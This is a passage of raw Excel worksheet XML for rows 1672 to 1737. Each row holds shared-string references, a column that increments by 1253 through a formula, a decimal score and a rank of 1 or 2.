        <v>35.244625091552727</v>
      </c>
      <c r="F1672">
        <v>1</v>
      </c>
    </row>
    <row r="1673" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1673" t="s">
        <v>3224</v>
      </c>
      <c r="B1673" t="s">
        <v>3225</v>
      </c>
      <c r="C1673">
        <f t="shared" si="25"/>
        <v>11525204</v>
      </c>
      <c r="D1673" t="s">
        <v>3227</v>
      </c>
      <c r="E1673">
        <v>1.94303528405726E-3</v>
      </c>
      <c r="F1673">
        <v>2</v>
      </c>
    </row>
    <row r="1674" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1674" t="s">
        <v>3228</v>
      </c>
      <c r="B1674" t="s">
        <v>3229</v>
      </c>
      <c r="C1674">
        <f t="shared" ref="C1674:C1737" si="26">C1673+1253</f>
        <v>11526457</v>
      </c>
      <c r="D1674" t="s">
        <v>3230</v>
      </c>
      <c r="E1674">
        <v>28.995841979980469</v>
      </c>
      <c r="F1674">
        <v>1</v>
      </c>
    </row>
    <row r="1675" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1675" t="s">
        <v>3228</v>
      </c>
      <c r="B1675" t="s">
        <v>3229</v>
      </c>
      <c r="C1675">
        <f t="shared" si="26"/>
        <v>11527710</v>
      </c>
      <c r="D1675" t="s">
        <v>3231</v>
      </c>
      <c r="E1675">
        <v>12.273556709289551</v>
      </c>
      <c r="F1675">
        <v>2</v>
      </c>
    </row>
    <row r="1676" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1676" t="s">
        <v>3232</v>
      </c>
      <c r="B1676" t="s">
        <v>3233</v>
      </c>
      <c r="C1676">
        <f t="shared" si="26"/>
        <v>11528963</v>
      </c>
      <c r="D1676" t="s">
        <v>3234</v>
      </c>
      <c r="E1676">
        <v>29.78007888793945</v>
      </c>
      <c r="F1676">
        <v>1</v>
      </c>
    </row>
    <row r="1677" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1677" t="s">
        <v>3232</v>
      </c>
      <c r="B1677" t="s">
        <v>3233</v>
      </c>
      <c r="C1677">
        <f t="shared" si="26"/>
        <v>11530216</v>
      </c>
      <c r="D1677" t="s">
        <v>3235</v>
      </c>
      <c r="E1677">
        <v>16.745098114013668</v>
      </c>
      <c r="F1677">
        <v>2</v>
      </c>
    </row>
    <row r="1678" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1678" t="s">
        <v>3236</v>
      </c>
      <c r="B1678" t="s">
        <v>3237</v>
      </c>
      <c r="C1678">
        <f t="shared" si="26"/>
        <v>11531469</v>
      </c>
      <c r="D1678" t="s">
        <v>3238</v>
      </c>
      <c r="E1678">
        <v>22.505100250244141</v>
      </c>
      <c r="F1678">
        <v>1</v>
      </c>
    </row>
    <row r="1679" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1679" t="s">
        <v>3236</v>
      </c>
      <c r="B1679" t="s">
        <v>3237</v>
      </c>
      <c r="C1679">
        <f t="shared" si="26"/>
        <v>11532722</v>
      </c>
      <c r="D1679" t="s">
        <v>3239</v>
      </c>
      <c r="E1679">
        <v>11.105142593383791</v>
      </c>
      <c r="F1679">
        <v>2</v>
      </c>
    </row>
    <row r="1680" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1680" t="s">
        <v>3240</v>
      </c>
      <c r="B1680" t="s">
        <v>3241</v>
      </c>
      <c r="C1680">
        <f t="shared" si="26"/>
        <v>11533975</v>
      </c>
      <c r="D1680" t="s">
        <v>3242</v>
      </c>
      <c r="E1680">
        <v>18.601875305175781</v>
      </c>
      <c r="F1680">
        <v>1</v>
      </c>
    </row>
    <row r="1681" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1681" t="s">
        <v>3240</v>
      </c>
      <c r="B1681" t="s">
        <v>3241</v>
      </c>
      <c r="C1681">
        <f t="shared" si="26"/>
        <v>11535228</v>
      </c>
      <c r="D1681" t="s">
        <v>3243</v>
      </c>
      <c r="E1681">
        <v>13.92079544067383</v>
      </c>
      <c r="F1681">
        <v>2</v>
      </c>
    </row>
    <row r="1682" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1682" t="s">
        <v>3244</v>
      </c>
      <c r="B1682" t="s">
        <v>3245</v>
      </c>
      <c r="C1682">
        <f t="shared" si="26"/>
        <v>11536481</v>
      </c>
      <c r="D1682" t="s">
        <v>3246</v>
      </c>
      <c r="E1682">
        <v>25.949771881103519</v>
      </c>
      <c r="F1682">
        <v>1</v>
      </c>
    </row>
    <row r="1683" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1683" t="s">
        <v>3244</v>
      </c>
      <c r="B1683" t="s">
        <v>3245</v>
      </c>
      <c r="C1683">
        <f t="shared" si="26"/>
        <v>11537734</v>
      </c>
      <c r="D1683" t="s">
        <v>3247</v>
      </c>
      <c r="E1683">
        <v>16.249784469604489</v>
      </c>
      <c r="F1683">
        <v>2</v>
      </c>
    </row>
    <row r="1684" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1684" t="s">
        <v>3248</v>
      </c>
      <c r="B1684" t="s">
        <v>3249</v>
      </c>
      <c r="C1684">
        <f t="shared" si="26"/>
        <v>11538987</v>
      </c>
      <c r="D1684" t="s">
        <v>3250</v>
      </c>
      <c r="E1684">
        <v>15.510318756103519</v>
      </c>
      <c r="F1684">
        <v>1</v>
      </c>
    </row>
    <row r="1685" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1685" t="s">
        <v>3248</v>
      </c>
      <c r="B1685" t="s">
        <v>3249</v>
      </c>
      <c r="C1685">
        <f t="shared" si="26"/>
        <v>11540240</v>
      </c>
      <c r="D1685" t="s">
        <v>3251</v>
      </c>
      <c r="E1685">
        <v>0.2731020450592041</v>
      </c>
      <c r="F1685">
        <v>2</v>
      </c>
    </row>
    <row r="1686" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1686" t="s">
        <v>3252</v>
      </c>
      <c r="B1686" t="s">
        <v>3253</v>
      </c>
      <c r="C1686">
        <f t="shared" si="26"/>
        <v>11541493</v>
      </c>
      <c r="D1686" t="s">
        <v>3254</v>
      </c>
      <c r="E1686">
        <v>29.275777816772461</v>
      </c>
      <c r="F1686">
        <v>1</v>
      </c>
    </row>
    <row r="1687" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1687" t="s">
        <v>3252</v>
      </c>
      <c r="B1687" t="s">
        <v>3253</v>
      </c>
      <c r="C1687">
        <f t="shared" si="26"/>
        <v>11542746</v>
      </c>
      <c r="D1687" t="s">
        <v>3255</v>
      </c>
      <c r="E1687">
        <v>6.7285232245922089E-2</v>
      </c>
      <c r="F1687">
        <v>2</v>
      </c>
    </row>
    <row r="1688" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1688" t="s">
        <v>3256</v>
      </c>
      <c r="B1688" t="s">
        <v>3257</v>
      </c>
      <c r="C1688">
        <f t="shared" si="26"/>
        <v>11543999</v>
      </c>
      <c r="D1688" t="s">
        <v>3258</v>
      </c>
      <c r="E1688">
        <v>32.632095336914063</v>
      </c>
      <c r="F1688">
        <v>1</v>
      </c>
    </row>
    <row r="1689" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1689" t="s">
        <v>3256</v>
      </c>
      <c r="B1689" t="s">
        <v>3257</v>
      </c>
      <c r="C1689">
        <f t="shared" si="26"/>
        <v>11545252</v>
      </c>
      <c r="D1689" t="s">
        <v>3259</v>
      </c>
      <c r="E1689">
        <v>9.7846307754516602</v>
      </c>
      <c r="F1689">
        <v>2</v>
      </c>
    </row>
    <row r="1690" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1690" t="s">
        <v>3260</v>
      </c>
      <c r="B1690" t="s">
        <v>3261</v>
      </c>
      <c r="C1690">
        <f t="shared" si="26"/>
        <v>11546505</v>
      </c>
      <c r="D1690" t="s">
        <v>3262</v>
      </c>
      <c r="E1690">
        <v>14.06597328186035</v>
      </c>
      <c r="F1690">
        <v>1</v>
      </c>
    </row>
    <row r="1691" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1691" t="s">
        <v>3260</v>
      </c>
      <c r="B1691" t="s">
        <v>3261</v>
      </c>
      <c r="C1691">
        <f t="shared" si="26"/>
        <v>11547758</v>
      </c>
      <c r="D1691" t="s">
        <v>3263</v>
      </c>
      <c r="E1691">
        <v>10.58294773101807</v>
      </c>
      <c r="F1691">
        <v>2</v>
      </c>
    </row>
    <row r="1692" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1692" t="s">
        <v>3264</v>
      </c>
      <c r="B1692" t="s">
        <v>3265</v>
      </c>
      <c r="C1692">
        <f t="shared" si="26"/>
        <v>11549011</v>
      </c>
      <c r="D1692" t="s">
        <v>3266</v>
      </c>
      <c r="E1692">
        <v>33.335788726806641</v>
      </c>
      <c r="F1692">
        <v>1</v>
      </c>
    </row>
    <row r="1693" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1693" t="s">
        <v>3264</v>
      </c>
      <c r="B1693" t="s">
        <v>3265</v>
      </c>
      <c r="C1693">
        <f t="shared" si="26"/>
        <v>11550264</v>
      </c>
      <c r="D1693" t="s">
        <v>3267</v>
      </c>
      <c r="E1693">
        <v>5.0695366859436044</v>
      </c>
      <c r="F1693">
        <v>2</v>
      </c>
    </row>
    <row r="1694" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1694" t="s">
        <v>3268</v>
      </c>
      <c r="B1694" t="s">
        <v>3269</v>
      </c>
      <c r="C1694">
        <f t="shared" si="26"/>
        <v>11551517</v>
      </c>
      <c r="D1694" t="s">
        <v>3270</v>
      </c>
      <c r="E1694">
        <v>26.237241744995121</v>
      </c>
      <c r="F1694">
        <v>1</v>
      </c>
    </row>
    <row r="1695" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1695" t="s">
        <v>3268</v>
      </c>
      <c r="B1695" t="s">
        <v>3269</v>
      </c>
      <c r="C1695">
        <f t="shared" si="26"/>
        <v>11552770</v>
      </c>
      <c r="D1695" t="s">
        <v>3271</v>
      </c>
      <c r="E1695">
        <v>12.90975189208984</v>
      </c>
      <c r="F1695">
        <v>2</v>
      </c>
    </row>
    <row r="1696" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1696" t="s">
        <v>3272</v>
      </c>
      <c r="B1696" t="s">
        <v>3273</v>
      </c>
      <c r="C1696">
        <f t="shared" si="26"/>
        <v>11554023</v>
      </c>
      <c r="D1696" t="s">
        <v>3274</v>
      </c>
      <c r="E1696">
        <v>42.240192413330078</v>
      </c>
      <c r="F1696">
        <v>1</v>
      </c>
    </row>
    <row r="1697" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1697" t="s">
        <v>3272</v>
      </c>
      <c r="B1697" t="s">
        <v>3273</v>
      </c>
      <c r="C1697">
        <f t="shared" si="26"/>
        <v>11555276</v>
      </c>
      <c r="D1697" t="s">
        <v>3275</v>
      </c>
      <c r="E1697">
        <v>3.8113644123077388</v>
      </c>
      <c r="F1697">
        <v>2</v>
      </c>
    </row>
    <row r="1698" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1698" t="s">
        <v>3276</v>
      </c>
      <c r="B1698" t="s">
        <v>3277</v>
      </c>
      <c r="C1698">
        <f t="shared" si="26"/>
        <v>11556529</v>
      </c>
      <c r="D1698" t="s">
        <v>3278</v>
      </c>
      <c r="E1698">
        <v>37.012905120849609</v>
      </c>
      <c r="F1698">
        <v>1</v>
      </c>
    </row>
    <row r="1699" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1699" t="s">
        <v>3276</v>
      </c>
      <c r="B1699" t="s">
        <v>3277</v>
      </c>
      <c r="C1699">
        <f t="shared" si="26"/>
        <v>11557782</v>
      </c>
      <c r="D1699" t="s">
        <v>3279</v>
      </c>
      <c r="E1699">
        <v>4.8672962188720703</v>
      </c>
      <c r="F1699">
        <v>2</v>
      </c>
    </row>
    <row r="1700" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1700" t="s">
        <v>3280</v>
      </c>
      <c r="B1700" t="s">
        <v>3281</v>
      </c>
      <c r="C1700">
        <f t="shared" si="26"/>
        <v>11559035</v>
      </c>
      <c r="D1700" t="s">
        <v>3282</v>
      </c>
      <c r="E1700">
        <v>34.046886444091797</v>
      </c>
      <c r="F1700">
        <v>1</v>
      </c>
    </row>
    <row r="1701" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1701" t="s">
        <v>3280</v>
      </c>
      <c r="B1701" t="s">
        <v>3281</v>
      </c>
      <c r="C1701">
        <f t="shared" si="26"/>
        <v>11560288</v>
      </c>
      <c r="D1701" t="s">
        <v>3283</v>
      </c>
      <c r="E1701">
        <v>2.744570083450526E-4</v>
      </c>
      <c r="F1701">
        <v>2</v>
      </c>
    </row>
    <row r="1702" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1702" t="s">
        <v>3284</v>
      </c>
      <c r="B1702" t="s">
        <v>3285</v>
      </c>
      <c r="C1702">
        <f t="shared" si="26"/>
        <v>11561541</v>
      </c>
      <c r="D1702" t="s">
        <v>3286</v>
      </c>
      <c r="E1702">
        <v>24.28458213806152</v>
      </c>
      <c r="F1702">
        <v>1</v>
      </c>
    </row>
    <row r="1703" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1703" t="s">
        <v>3284</v>
      </c>
      <c r="B1703" t="s">
        <v>3285</v>
      </c>
      <c r="C1703">
        <f t="shared" si="26"/>
        <v>11562794</v>
      </c>
      <c r="D1703" t="s">
        <v>3287</v>
      </c>
      <c r="E1703">
        <v>11.1455545425415</v>
      </c>
      <c r="F1703">
        <v>2</v>
      </c>
    </row>
    <row r="1704" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1704" t="s">
        <v>3288</v>
      </c>
      <c r="B1704" t="s">
        <v>3289</v>
      </c>
      <c r="C1704">
        <f t="shared" si="26"/>
        <v>11564047</v>
      </c>
      <c r="D1704" t="s">
        <v>3290</v>
      </c>
      <c r="E1704">
        <v>30.59235763549805</v>
      </c>
      <c r="F1704">
        <v>1</v>
      </c>
    </row>
    <row r="1705" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1705" t="s">
        <v>3288</v>
      </c>
      <c r="B1705" t="s">
        <v>3289</v>
      </c>
      <c r="C1705">
        <f t="shared" si="26"/>
        <v>11565300</v>
      </c>
      <c r="D1705" t="s">
        <v>3291</v>
      </c>
      <c r="E1705">
        <v>1.407336094416678E-3</v>
      </c>
      <c r="F1705">
        <v>2</v>
      </c>
    </row>
    <row r="1706" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1706" t="s">
        <v>3292</v>
      </c>
      <c r="B1706" t="s">
        <v>3293</v>
      </c>
      <c r="C1706">
        <f t="shared" si="26"/>
        <v>11566553</v>
      </c>
      <c r="D1706" t="s">
        <v>3294</v>
      </c>
      <c r="E1706">
        <v>15.437543869018549</v>
      </c>
      <c r="F1706">
        <v>1</v>
      </c>
    </row>
    <row r="1707" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1707" t="s">
        <v>3292</v>
      </c>
      <c r="B1707" t="s">
        <v>3293</v>
      </c>
      <c r="C1707">
        <f t="shared" si="26"/>
        <v>11567806</v>
      </c>
      <c r="D1707" t="s">
        <v>3295</v>
      </c>
      <c r="E1707">
        <v>13.558248519897459</v>
      </c>
      <c r="F1707">
        <v>2</v>
      </c>
    </row>
    <row r="1708" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1708" t="s">
        <v>3296</v>
      </c>
      <c r="B1708" t="s">
        <v>3297</v>
      </c>
      <c r="C1708">
        <f t="shared" si="26"/>
        <v>11569059</v>
      </c>
      <c r="D1708" t="s">
        <v>3298</v>
      </c>
      <c r="E1708">
        <v>40.828033447265618</v>
      </c>
      <c r="F1708">
        <v>1</v>
      </c>
    </row>
    <row r="1709" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1709" t="s">
        <v>3296</v>
      </c>
      <c r="B1709" t="s">
        <v>3297</v>
      </c>
      <c r="C1709">
        <f t="shared" si="26"/>
        <v>11570312</v>
      </c>
      <c r="D1709" t="s">
        <v>3299</v>
      </c>
      <c r="E1709">
        <v>0.17834760248661041</v>
      </c>
      <c r="F1709">
        <v>2</v>
      </c>
    </row>
    <row r="1710" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1710" t="s">
        <v>3300</v>
      </c>
      <c r="B1710" t="s">
        <v>3301</v>
      </c>
      <c r="C1710">
        <f t="shared" si="26"/>
        <v>11571565</v>
      </c>
      <c r="D1710" t="s">
        <v>3302</v>
      </c>
      <c r="E1710">
        <v>25.615402221679691</v>
      </c>
      <c r="F1710">
        <v>1</v>
      </c>
    </row>
    <row r="1711" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1711" t="s">
        <v>3300</v>
      </c>
      <c r="B1711" t="s">
        <v>3303</v>
      </c>
      <c r="C1711">
        <f t="shared" si="26"/>
        <v>11572818</v>
      </c>
      <c r="D1711" t="s">
        <v>3304</v>
      </c>
      <c r="E1711">
        <v>0.75461888313293457</v>
      </c>
      <c r="F1711">
        <v>2</v>
      </c>
    </row>
    <row r="1712" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1712" t="s">
        <v>3305</v>
      </c>
      <c r="B1712" t="s">
        <v>3306</v>
      </c>
      <c r="C1712">
        <f t="shared" si="26"/>
        <v>11574071</v>
      </c>
      <c r="D1712" t="s">
        <v>3307</v>
      </c>
      <c r="E1712">
        <v>23.723968505859379</v>
      </c>
      <c r="F1712">
        <v>1</v>
      </c>
    </row>
    <row r="1713" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1713" t="s">
        <v>3305</v>
      </c>
      <c r="B1713" t="s">
        <v>3306</v>
      </c>
      <c r="C1713">
        <f t="shared" si="26"/>
        <v>11575324</v>
      </c>
      <c r="D1713" t="s">
        <v>3308</v>
      </c>
      <c r="E1713">
        <v>8.3911418914794922</v>
      </c>
      <c r="F1713">
        <v>2</v>
      </c>
    </row>
    <row r="1714" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1714" t="s">
        <v>3309</v>
      </c>
      <c r="B1714" t="s">
        <v>3310</v>
      </c>
      <c r="C1714">
        <f t="shared" si="26"/>
        <v>11576577</v>
      </c>
      <c r="D1714" t="s">
        <v>3311</v>
      </c>
      <c r="E1714">
        <v>27.886848449707031</v>
      </c>
      <c r="F1714">
        <v>1</v>
      </c>
    </row>
    <row r="1715" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1715" t="s">
        <v>3309</v>
      </c>
      <c r="B1715" t="s">
        <v>3310</v>
      </c>
      <c r="C1715">
        <f t="shared" si="26"/>
        <v>11577830</v>
      </c>
      <c r="D1715" t="s">
        <v>3312</v>
      </c>
      <c r="E1715">
        <v>15.26298809051514</v>
      </c>
      <c r="F1715">
        <v>2</v>
      </c>
    </row>
    <row r="1716" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1716" t="s">
        <v>3313</v>
      </c>
      <c r="B1716" t="s">
        <v>3314</v>
      </c>
      <c r="C1716">
        <f t="shared" si="26"/>
        <v>11579083</v>
      </c>
      <c r="D1716" t="s">
        <v>3315</v>
      </c>
      <c r="E1716">
        <v>21.734504699707031</v>
      </c>
      <c r="F1716">
        <v>1</v>
      </c>
    </row>
    <row r="1717" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1717" t="s">
        <v>3313</v>
      </c>
      <c r="B1717" t="s">
        <v>3314</v>
      </c>
      <c r="C1717">
        <f t="shared" si="26"/>
        <v>11580336</v>
      </c>
      <c r="D1717" t="s">
        <v>3316</v>
      </c>
      <c r="E1717">
        <v>4.7790985107421884</v>
      </c>
      <c r="F1717">
        <v>2</v>
      </c>
    </row>
    <row r="1718" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1718" t="s">
        <v>3317</v>
      </c>
      <c r="B1718" t="s">
        <v>3318</v>
      </c>
      <c r="C1718">
        <f t="shared" si="26"/>
        <v>11581589</v>
      </c>
      <c r="D1718" t="s">
        <v>3307</v>
      </c>
      <c r="E1718">
        <v>23.5589599609375</v>
      </c>
      <c r="F1718">
        <v>1</v>
      </c>
    </row>
    <row r="1719" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1719" t="s">
        <v>3317</v>
      </c>
      <c r="B1719" t="s">
        <v>3318</v>
      </c>
      <c r="C1719">
        <f t="shared" si="26"/>
        <v>11582842</v>
      </c>
      <c r="D1719" t="s">
        <v>3319</v>
      </c>
      <c r="E1719">
        <v>1.4349354023579511E-4</v>
      </c>
      <c r="F1719">
        <v>2</v>
      </c>
    </row>
    <row r="1720" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1720" t="s">
        <v>3320</v>
      </c>
      <c r="B1720" t="s">
        <v>687</v>
      </c>
      <c r="C1720">
        <f t="shared" si="26"/>
        <v>11584095</v>
      </c>
      <c r="D1720" t="s">
        <v>688</v>
      </c>
      <c r="E1720">
        <v>21.75241661071777</v>
      </c>
      <c r="F1720">
        <v>1</v>
      </c>
    </row>
    <row r="1721" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1721" t="s">
        <v>3320</v>
      </c>
      <c r="B1721" t="s">
        <v>687</v>
      </c>
      <c r="C1721">
        <f t="shared" si="26"/>
        <v>11585348</v>
      </c>
      <c r="D1721" t="s">
        <v>3321</v>
      </c>
      <c r="E1721">
        <v>15.204262733459471</v>
      </c>
      <c r="F1721">
        <v>2</v>
      </c>
    </row>
    <row r="1722" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1722" t="s">
        <v>3322</v>
      </c>
      <c r="B1722" t="s">
        <v>3323</v>
      </c>
      <c r="C1722">
        <f t="shared" si="26"/>
        <v>11586601</v>
      </c>
      <c r="D1722" t="s">
        <v>3324</v>
      </c>
      <c r="E1722">
        <v>30.391448974609379</v>
      </c>
      <c r="F1722">
        <v>1</v>
      </c>
    </row>
    <row r="1723" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1723" t="s">
        <v>3322</v>
      </c>
      <c r="B1723" t="s">
        <v>3323</v>
      </c>
      <c r="C1723">
        <f t="shared" si="26"/>
        <v>11587854</v>
      </c>
      <c r="D1723" t="s">
        <v>3325</v>
      </c>
      <c r="E1723">
        <v>9.7462911605834961</v>
      </c>
      <c r="F1723">
        <v>2</v>
      </c>
    </row>
    <row r="1724" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1724" t="s">
        <v>3326</v>
      </c>
      <c r="B1724" t="s">
        <v>2567</v>
      </c>
      <c r="C1724">
        <f t="shared" si="26"/>
        <v>11589107</v>
      </c>
      <c r="D1724" t="s">
        <v>2568</v>
      </c>
      <c r="E1724">
        <v>22.93019866943359</v>
      </c>
      <c r="F1724">
        <v>1</v>
      </c>
    </row>
    <row r="1725" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1725" t="s">
        <v>3326</v>
      </c>
      <c r="B1725" t="s">
        <v>2567</v>
      </c>
      <c r="C1725">
        <f t="shared" si="26"/>
        <v>11590360</v>
      </c>
      <c r="D1725" t="s">
        <v>3327</v>
      </c>
      <c r="E1725">
        <v>12.46247386932373</v>
      </c>
      <c r="F1725">
        <v>2</v>
      </c>
    </row>
    <row r="1726" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1726" t="s">
        <v>3328</v>
      </c>
      <c r="B1726" t="s">
        <v>3329</v>
      </c>
      <c r="C1726">
        <f t="shared" si="26"/>
        <v>11591613</v>
      </c>
      <c r="D1726" t="s">
        <v>3330</v>
      </c>
      <c r="E1726">
        <v>28.26933670043945</v>
      </c>
      <c r="F1726">
        <v>1</v>
      </c>
    </row>
    <row r="1727" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1727" t="s">
        <v>3328</v>
      </c>
      <c r="B1727" t="s">
        <v>3329</v>
      </c>
      <c r="C1727">
        <f t="shared" si="26"/>
        <v>11592866</v>
      </c>
      <c r="D1727" t="s">
        <v>3331</v>
      </c>
      <c r="E1727">
        <v>1.150954328477383E-2</v>
      </c>
      <c r="F1727">
        <v>2</v>
      </c>
    </row>
    <row r="1728" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1728" t="s">
        <v>3332</v>
      </c>
      <c r="B1728" t="s">
        <v>3333</v>
      </c>
      <c r="C1728">
        <f t="shared" si="26"/>
        <v>11594119</v>
      </c>
      <c r="D1728" t="s">
        <v>3334</v>
      </c>
      <c r="E1728">
        <v>25.503494262695309</v>
      </c>
      <c r="F1728">
        <v>1</v>
      </c>
    </row>
    <row r="1729" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1729" t="s">
        <v>3332</v>
      </c>
      <c r="B1729" t="s">
        <v>3333</v>
      </c>
      <c r="C1729">
        <f t="shared" si="26"/>
        <v>11595372</v>
      </c>
      <c r="D1729" t="s">
        <v>3335</v>
      </c>
      <c r="E1729">
        <v>14.905269622802731</v>
      </c>
      <c r="F1729">
        <v>2</v>
      </c>
    </row>
    <row r="1730" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1730" t="s">
        <v>3336</v>
      </c>
      <c r="B1730" t="s">
        <v>3337</v>
      </c>
      <c r="C1730">
        <f t="shared" si="26"/>
        <v>11596625</v>
      </c>
      <c r="D1730" t="s">
        <v>3307</v>
      </c>
      <c r="E1730">
        <v>22.929048538208011</v>
      </c>
      <c r="F1730">
        <v>1</v>
      </c>
    </row>
    <row r="1731" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1731" t="s">
        <v>3336</v>
      </c>
      <c r="B1731" t="s">
        <v>3337</v>
      </c>
      <c r="C1731">
        <f t="shared" si="26"/>
        <v>11597878</v>
      </c>
      <c r="D1731" t="s">
        <v>3338</v>
      </c>
      <c r="E1731">
        <v>2.284159898757935</v>
      </c>
      <c r="F1731">
        <v>2</v>
      </c>
    </row>
    <row r="1732" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1732" t="s">
        <v>3339</v>
      </c>
      <c r="B1732" t="s">
        <v>3340</v>
      </c>
      <c r="C1732">
        <f t="shared" si="26"/>
        <v>11599131</v>
      </c>
      <c r="D1732" t="s">
        <v>3341</v>
      </c>
      <c r="E1732">
        <v>27.521368026733398</v>
      </c>
      <c r="F1732">
        <v>1</v>
      </c>
    </row>
    <row r="1733" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1733" t="s">
        <v>3339</v>
      </c>
      <c r="B1733" t="s">
        <v>3342</v>
      </c>
      <c r="C1733">
        <f t="shared" si="26"/>
        <v>11600384</v>
      </c>
      <c r="D1733" t="s">
        <v>3343</v>
      </c>
      <c r="E1733">
        <v>9.2728357315063477</v>
      </c>
      <c r="F1733">
        <v>2</v>
      </c>
    </row>
    <row r="1734" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1734" t="s">
        <v>3344</v>
      </c>
      <c r="B1734" t="s">
        <v>3345</v>
      </c>
      <c r="C1734">
        <f t="shared" si="26"/>
        <v>11601637</v>
      </c>
      <c r="D1734" t="s">
        <v>3346</v>
      </c>
      <c r="E1734">
        <v>18.535018920898441</v>
      </c>
      <c r="F1734">
        <v>1</v>
      </c>
    </row>
    <row r="1735" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1735" t="s">
        <v>3344</v>
      </c>
      <c r="B1735" t="s">
        <v>3345</v>
      </c>
      <c r="C1735">
        <f t="shared" si="26"/>
        <v>11602890</v>
      </c>
      <c r="D1735" t="s">
        <v>3347</v>
      </c>
      <c r="E1735">
        <v>17.702182769775391</v>
      </c>
      <c r="F1735">
        <v>2</v>
      </c>
    </row>
    <row r="1736" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1736" t="s">
        <v>3348</v>
      </c>
      <c r="B1736" t="s">
        <v>3349</v>
      </c>
      <c r="C1736">
        <f t="shared" si="26"/>
        <v>11604143</v>
      </c>
      <c r="D1736" t="s">
        <v>3350</v>
      </c>
      <c r="E1736">
        <v>30.110721588134769</v>
      </c>
      <c r="F1736">
        <v>1</v>
      </c>
    </row>
    <row r="1737" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1737" t="s">
        <v>3348</v>
      </c>
      <c r="B1737" t="s">
        <v>3349</v>
      </c>
      <c r="C1737">
        <f t="shared" si="26"/>
        <v>11605396</v>
      </c>
      <c r="D1737" t="s">
        <v>3351</v>
      </c>
      <c r="E1737">
